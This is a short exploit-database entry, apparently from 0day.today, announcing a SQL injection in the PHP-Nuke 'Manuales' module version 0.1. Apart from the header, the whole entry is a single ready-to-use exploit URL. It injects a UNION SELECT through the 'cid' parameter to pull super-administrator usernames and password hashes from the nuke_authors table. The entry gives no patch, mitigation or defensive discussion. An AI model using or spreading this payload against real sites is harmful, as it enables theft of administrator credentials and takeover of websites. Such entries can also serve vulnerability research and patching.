id: 2678
date: 02/21/2008
title: PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection Vulnerability
author: xoron
cves: 

===============================================================
PHP-Nuke Modules Manuales 0.1 (cid) SQL Injection Vulnerability
===============================================================



=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

PHP-NUKE Modules Manuales v0.1 Remote SQL Injection

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
modules.php?name=Manuales&d_op=viewdownload&cid=1/**/union/**/select/**/0,aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=



#  0day.today [2023-03-26]  #